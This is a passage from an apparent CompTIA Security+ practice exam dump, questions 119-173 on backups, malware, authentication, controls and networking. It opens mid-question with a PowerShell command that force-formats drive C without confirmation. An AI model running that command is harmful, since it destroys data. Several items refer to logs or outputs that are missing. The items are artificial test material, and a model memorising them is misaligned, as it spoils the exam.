New-Partition -DiskNumber 2 -UseMaximumSize -AssignDriveLetter C| Format-Volume -Driveletter C - FileSystemLabel "New"-FileSystem NTFS - Full -Force -Confirm:$false

Which of the following is the malware using to execute the attack?

Options:

A.

PowerShell

B.

Python

C.

Bash

D.

Macros

Questions 119

A local server recently crashed, and the team is attempting to restore the server from a backup. During the restore process, the team notices the file size of each daily backup is large and will run out of space at the current rate.

The current solution appears to do a full backup every night. Which of the following would use the least amount of storage space for backups?

Options:

A.

A weekly, incremental backup with daily differential backups

B.

A weekly, full backup with daily snapshot backups

C.

A weekly, full backup with daily differential backups

D.

A weekly, full backup with daily incremental backups

Questions 120

A company's help desk received several AV alerts indicating Mimikatz attempted to run on the remote systems. Several users also reported that the new company flash drives they picked up in the break room only have 512KB of storage. Which of the following is most likely the cause?

Options:

A.

The GPO prevents the use of flash drives, which triggers a false positive AV indication and restricts the drives to only 512KB of storage

B.

The new flash drives need a driver that is being blocked by the AV software because the flash drives are not on the application's allow list, temporarily restricting the drives to 512KB of storage.

C.

The new flash drives are incorrectly partitioned, and the systems are automatically trying to use an unapproved application to repartition the drives.

D.

The GPO blocking the flash drives is being bypassed by a malicious flash drive that is attempting to harvest plaintext credentials from memory.

Questions 121

A software development manager wants to ensure the authenticity of the code created by the company. Which of the following options is the most appropriate?

Options:

A.

Testing input validation on the user input fields

B.

Performing code signing on company-developed software

C.

Performing static code analysis on the software

D.

Ensuring secure cookies are used

Questions 122

Which of the following will increase cryptographic security?

Options:

A.

High data entropy

B.

Algorithms that require less computing power

C.

Longer key longevity

D.

Hashing

Questions 123

Security analysts notice a server login from a user who has been on vacation for two weeks. The analysts confirm that the user did not log in to the system while on vacation. After reviewing packet capture, the analysts notice the following:

Which of the following occurred?

Options:

A.

A buffer overflow was exploited to gain unauthorized access.

B.

The user's account was compromised, and an attacker changed the login credentials.

C.

An attacker used a pass-the-hash attack to gain access.

D.

An insider threat with username logged in to the account.

Questions 124

Which of the following threat actors is most likely to be motivated by ideology?

Options:

A.

Business competitor

B.

Hacktivist

C.

Criminal syndicate

D.

Script kiddie

E.

Disgruntled employee

Questions 125

An organization has expanded its operations by opening a remote office. The new office is fully furnished with office resources to support up to 50 employees working on any given day. Which of the following VPN solutions would best support the new office?

Options:

A.

Always-on

B.

Remote access

C.

Site-to-site

D.

Full tunnel

Questions 126

An organization with a low tolerance for user inconvenience wants to protect laptop hard drives against loss or data theft. Which of the following would be the most acceptable?

Options:

A.

SED

B.

HSM

C.

DLP

D.

TPM

Questions 127

Which of the following security concepts should an e-commerce organization apply for protection against erroneous purchases?

Options:

A.

Privacy

B.

Availability

C.

Integrity

D.

Confidentiality

Questions 128

A newly purchased corporate WAP needs to be configured in the MOST secure manner possible.

INSTRUCTIONS

Please click on the below items on the network diagram and configure them accordingly:

  • WAP
  • DHCP Server
  • AAA Server
  • Wireless Controller
  • LDAP Server

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Options:

Questions 129

A security analyst is looking for a solution to help communicate to the leadership team the severity levels of the organization's vulnerabilities. Which of the following would best meet this need?

Options:

A.

CVE

B.

SIEM

C.

SOAR

D.

CVSS

Questions 130

Two organizations are discussing a possible merger. Both organizations' Chief Financial Officers would like to safely share payroll data with each other to determine if the pay scales for different roles are similar at both organizations. Which of the following techniques would be best to protect employee data while allowing the companies to successfully share this information?

Options:

A.

Pseudo-anonymization

B.

Tokenization

C.

Data masking

D.

Encryption

Questions 131

Which of the following will provide the best physical security countermeasures to stop intruders? (Select two).

Options:

A.

Alarm

B.

Signage

C.

Lighting

D.

Access control vestibules

E.

Fencing

F.

Sensors

Questions 132

An organization is building a new headquarters and has placed fake cameras around the building in an attempt to discourage potential intruders. Which of the following kinds of controls describes this security method?

Options:

A.

Detective

B.

Deterrent

C.

Directive

D.

Corrective

Questions 133

A dynamic application vulnerability scan identified code injection could be performed using a web form. Which of the following will be the BEST remediation to prevent this vulnerability?

Options:

A.

Implement input validations

B.

Deploy MFA

C.

Utilize a WAF

D.

Configure HIPS

Questions 134

A Chief Information Security Officer (CISO) is evaluating the dangers involved in deploying a new ERP system for the company. The CISO categorizes the system, selects the controls that apply to the system, implements the controls, and then assesses the success of the controls before authorizing the system. Which of the following is the CISO using to evaluate the environment for this new ERP system?

Options:

A.

The Diamond Model of Intrusion Analysis

B.

CIS Critical Security Controls

C.

NIST Risk Management Framework

D.

ISO 27002

Questions 135

Which of the following is required in order for an IDS and a WAF to be effective on HTTPS traffic?

Options:

A.

Hashing

B.

DNS sinkhole

C.

TLS inspection

D.

Data masking

Questions 136

A security assessment found that several embedded systems are running unsecure protocols. These systems were purchased two years ago and the company that developed them is no longer in business. Which of the following constraints BEST describes the reason the findings cannot be remediated?

Options:

A.

Inability to authenticate

B.

Implied trust

C.

Lack of computing power

D.

Unavailable patch

Questions 137

Remote workers in an organization use company-provided laptops with locally installed applications and locally stored data. Users can store data on a remote server using an encrypted connection. The organization discovered data stored on a laptop had been made available to the public. Which of the following security solutions would mitigate the risk of future data disclosures?

Options:

A.

FDE

B.

TPM

C.

HIDS

D.

VPN

Questions 138

A security researcher is tracking an adversary by noting its attacks and techniques based on its capabilities, infrastructure, and victims. Which of the following is the researcher MOST likely using?

Options:

A.

The Diamond Model of Intrusion Analysis

B.

The Cyber Kill Chain

C.

The MITRE CVE database

D.

The incident response process

Questions 139

Which of the following BEST describes a social-engineering attack that relies on an executive at a small business visiting a fake banking website where credit card and account details are harvested?

Options:

A.

Whaling

B.

Spam

C.

Invoice scam

D.

Pharming

Questions 140

Certain users are reporting their accounts are being used to send unauthorized emails and conduct suspicious activities. After further investigation, a security analyst notices the following:

• All users share workstations throughout the day.

• Endpoint protection was disabled on several workstations throughout the network.

• Travel times on logins from the affected users are impossible.

• Sensitive data is being uploaded to external sites.

• All user account passwords were forced to be reset and the issue continued.

Which of the following attacks is being used to compromise the user accounts?

Options:

A.

Brute-force

B.

Keylogger

C.

Dictionary

D.

Rainbow

Questions 141

A backdoor was detected on the containerized application environment. The investigation detected that a zero-day vulnerability was introduced when the latest container image version was downloaded from a public registry. Which of the following is the BEST solution to prevent this type of incident from occurring again?

Options:

A.

Enforce the use of a controlled trusted source of container images

B.

Deploy an IPS solution capable of detecting signatures of attacks targeting containers

C.

Define a vulnerability scan to assess container images before being introduced on the environment

D.

Create a dedicated VPC for the containerized environment

Questions 142

Which of the following in a forensic investigation should be prioritized based on the order of volatility? (Select TWO).

Options:

A.

Page files

B.

Event logs

C.

RAM

D.

Cache

E.

Stored files

F.

HDD

Questions 143

An application owner reports suspicious activity on an internal financial application from various internal users within the past 14 days. A security analyst notices the following:

• Financial transactions were occurring during irregular time frames and outside of business hours by unauthorized users.

• Internal users in question were changing their passwords frequently during that time period.

• A jump box that several domain administrator users use to connect to remote devices was recently compromised.

• The authentication method used in the environment is NTLM.

Which of the following types of attacks is MOST likely being used to gain unauthorized access?

Options:

A.

Pass-the-hash

B.

Brute-force

C.

Directory traversal

D.

Replay

Questions 144

Which of the following environments would MOST likely be used to assess the execution of component parts of a system at both the hardware and software levels and to measure performance characteristics?

Options:

A.

Test

B.

Staging

C.

Development

D.

Production

Questions 145

A new vulnerability in the SMB protocol on the Windows systems was recently discovered, but no patches are currently available to resolve the issue. The security administrator is concerned that servers in the company's DMZ will be vulnerable to external attack; however, the administrator cannot disable the service on the servers, as SMB is used by a number of internal systems and applications on the LAN. Which of the following TCP ports should be blocked for all external inbound connections to the DMZ as a workaround to protect the servers? (Select TWO).

Options:

A.

135

B.

139

C.

143

D.

161

E.

443

F.

445

Questions 146

During an incident, a company's CIRT determines it is necessary to observe the continued network-based transaction between a callback domain and the malware running on an enterprise PC. Which of the following techniques would be BEST to enable this activity while reducing the risk of lateral spread and the risk that the adversary would notice any changes?

Options:

A.

Physically move the PC to a separate internet point of presence

B.

Create and apply micro segmentation rules.

C.

Emulate the malware in a heavily monitored DMZ segment.

D.

Apply network blacklisting rules for the adversary domain

Questions 147

An organization recently acquired an ISO 27001 certification. Which of the following would MOST likely be considered a benefit of this certification?

Options:

A.

It allows for the sharing of digital forensics data across organizations

B.

It provides insurance in case of a data breach

C.

It provides complimentary training and certification resources to IT security staff.

D.

It certifies the organization can work with foreign entities that require a security clearance

E.

It assures customers that the organization meets security standards

Questions 148

A company recently decided to allow its employees to use their personally owned devices for tasks like checking email and messaging via mobile applications. The company would like to use MDM, but employees are concerned about the loss of personal data. Which of the following should the IT department implement to BEST protect the company against company data loss while still addressing the employees’ concerns?

Options:

A.

Enable the remote-wiping option in the MDM software in case the phone is stolen.

B.

Configure the MDM software to enforce the use of PINs to access the phone.

C.

Configure MDM for FDE without enabling the lock screen.

D.

Perform a factory reset on the phone before installing the company's applications.

Questions 149

A company installed several crosscut shredders as part of increased information security practices targeting data leakage risks. Which of the following will this practice reduce?

Options:

A.

Dumpster diving

B.

Shoulder surfing

C.

Information elicitation

D.

Credential harvesting

Questions 150

A security analyst reviews a company’s authentication logs and notices multiple authentication failures. The authentication failures are from different usernames that share the same source IP address. Which of the password attacks is MOST likely happening?

Options:

A.

Dictionary

B.

Rainbow table

C.

Spraying

D.

Brute-force

Questions 151

A security administrator is setting up a SIEM to help monitor for notable events across the enterprise. Which of the following control types does this BEST represent?

Options:

A.

Preventive

B.

Compensating

C.

Corrective

D.

Detective

Questions 152

An analyst is generating a security report for the management team. Security guidelines recommend disabling all listening unencrypted services. Given this output from Nmap:

Which of the following should the analyst recommend to disable?

Options:

A.

21/tcp

B.

22/tcp

C.

23/tcp

D.

443/tcp

Questions 153

The Chief Technology Officer of a local college would like visitors to utilize the school's WiFi but must be able to associate potential malicious activity to a specific person. Which of the following would BEST allow this objective to be met?

Options:

A.

Requiring all new, on-site visitors to configure their devices to use WPS

B.

Implementing a new SSID for every event hosted by the college that has visitors

C.

Creating a unique PSK for every visitor when they arrive at the reception area

D.

Deploying a captive portal to capture visitors' MAC addresses and names

Questions 154

A user attempts to load a web-based application, but the expected login screen does not appear. A help desk analyst troubleshoots the issue by running the following command and reviewing the output on the user's PC

The help desk analyst then runs the same command on the local PC

Which of the following BEST describes the attack that is being detected?

Options:

A.

Domain hijacking

B.

DNS poisoning

C.

MAC flooding

D.

Evil twin

Questions 155

A Chief Information Officer receives an email stating a database will be encrypted within 24 hours unless a payment of $20,000 is credited to the account mentioned in the email. This BEST describes a scenario related to:

Options:

A.

whaling.

B.

smishing.

C.

spear phishing

D.

vishing

Questions 156

The Chief Information Security Officer (CISO) has decided to reorganize security staff to concentrate on incident response and to outsource outbound Internet URL categorization and filtering to an outside company. Additionally, the CISO would like this solution to provide the same protections even when a company laptop or mobile device is away from a home office. Which of the following should the CISO choose?

Options:

A.

CASB

B.

Next-generation SWG

C.

NGFW

D.

Web-application firewall

Questions 157

The technology department at a large global company is expanding its Wi-Fi network infrastructure at the headquarters building. Which of the following should be closely coordinated between the technology, cybersecurity, and physical security departments?

Options:

A.

Authentication protocol

B.

Encryption type

C.

WAP placement

D.

VPN configuration

Questions 158

A large enterprise has moved all its data to the cloud behind strong authentication and encryption. A sales director recently had a laptop stolen, and later, enterprise data was found to have been compromised from a local database. Which of the following was the MOST likely cause?

Options:

A.

Shadow IT

B.

Credential stuffing

C.

SQL injection

D.

Man in the browser

E.

Bluejacking

Questions 159

A security analyst needs an overview of vulnerabilities for a host on the network. Which of the following is the BEST type of scan for the analyst to run to discover which vulnerable services are running?

Options:

A.

Non-credentialed

B.

Web application

C.

Privileged

D.

Internal

Questions 160

The Chief Information Security Officer has directed the security and networking team to retire the use of shared passwords on routers and switches. Which of the following choices BEST meets the requirements?

Options:

A.

SAML

B.

TACACS+

C.

Password vaults

D.

OAuth

Questions 161

A company recently experienced a major breach. An investigation concludes that customer credit card data was stolen and exfiltrated through a dedicated business partner connection to a vendor, who is not held to the same security control standards. Which of the following is the MOST likely source of the breach?

Options:

A.

Side channel

B.

Supply chain

C.

Cryptographic downgrade

D.

Malware

Questions 162

A security analyst must enforce policies to harden an MDM infrastructure. The requirements are as follows:

* Ensure mobile devices can be tracked and wiped.

* Confirm mobile devices are encrypted.

Which of the following should the analyst enable on all the devices to meet these requirements?

Options:

A.

Geofencing

B.

Biometric authentication

C.

Geolocation

D.

Geotagging

Questions 163

A financial institution would like to store its customer data in a cloud but still allow the data to be accessed and manipulated while encrypted. Doing so would prevent the cloud service provider from being able to decipher the data due to its sensitivity. The financial institution is not concerned about computational overheads and slow speeds. Which of the following cryptographic techniques would BEST meet the requirement?

Options:

A.

Asymmetric

B.

Symmetric

C.

Homomorphic

D.

Ephemeral

Questions 164

Which of the following biometric authentication methods is the MOST accurate?

Options:

A.

Gait

B.

Retina

C.

Signature

D.

Voice

Questions 165

An organization's Chief Information Security Officer is creating a position that will be responsible for implementing technical controls to protect data, including ensuring backups are properly maintained. Which of the following roles would MOST likely include these responsibilities?

Options:

A.

Data protection officer

B.

Data owner

C.

Backup administrator

D.

Data custodian

E.

Internal auditor

Questions 166

Which of the following should a technician consider when selecting an encryption method for data that needs to remain confidential for a specific length of time?

Options:

A.

The key length of the encryption algorithm

B.

The encryption algorithm's longevity

C.

A method of introducing entropy into key calculations

D.

The computational overhead of calculating the encryption key

Questions 167

A security analyst is investigating multiple hosts that are communicating to external IP addresses during the hours of 2:00 a.m. - 4:00 a.m. The malware has evaded detection by traditional antivirus software. Which of the following types of malware is MOST likely infecting the hosts?

Options:

A.

A RAT

B.

Ransomware

C.

Polymorphic

D.

A worm

Questions 168

You received the output of a recent vulnerability assessment.

Review the assessment and scan output and determine the appropriate remediation(s) for each device.

Remediation options may be selected multiple times, and some devices may require more than one remediation.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Options:

Questions 169

A systems engineer is building a new system for production. Which of the following is the FINAL step to be performed prior to promoting to production?

Options:

A.

Disable unneeded services.

B.

Install the latest security patches.

C.

Run a vulnerability scan.

D.

Encrypt all disks.

Questions 170

After segmenting the network, the network manager wants to control the traffic between the segments. Which of the following should the manager use to control the network traffic?

Options:

A.

A DMZ

B.

A VPN

C.

A VLAN

D.

An ACL

Questions 171

Which of the following are the MOST likely vectors for the unauthorized inclusion of vulnerable code in a software company’s final software releases? (Select TWO.)

Options:

A.

Unsecure protocols

B.

Use of penetration-testing utilities

C.

Weak passwords

D.

Included third-party libraries

E.

Vendors/supply chain

F.

Outdated anti-malware software

Questions 172

A company reduced the area utilized in its datacenter by creating virtual networking through automation and by creating provisioning routes and rules through scripting. Which of the following does this example describe?

Options:

A.

IaC

B.

MSSP

C.

Containers

D.

SaaS

Questions 173

A company has discovered unauthorized devices are using its WiFi network, and it wants to harden the access point to improve security. Which of the following configurations should an analyst enable to improve security? (Select TWO.)

Options:

A.

RADIUS

B.

PEAP

C.

WPS

D.

WEP-EKIP

E.

SSL

F.

WPA2-PSK

Exam Code: SY0-601
Exam Name: CompTIA Security+ Exam 2021
Last Update: Sep 21, 2023
Questions: 577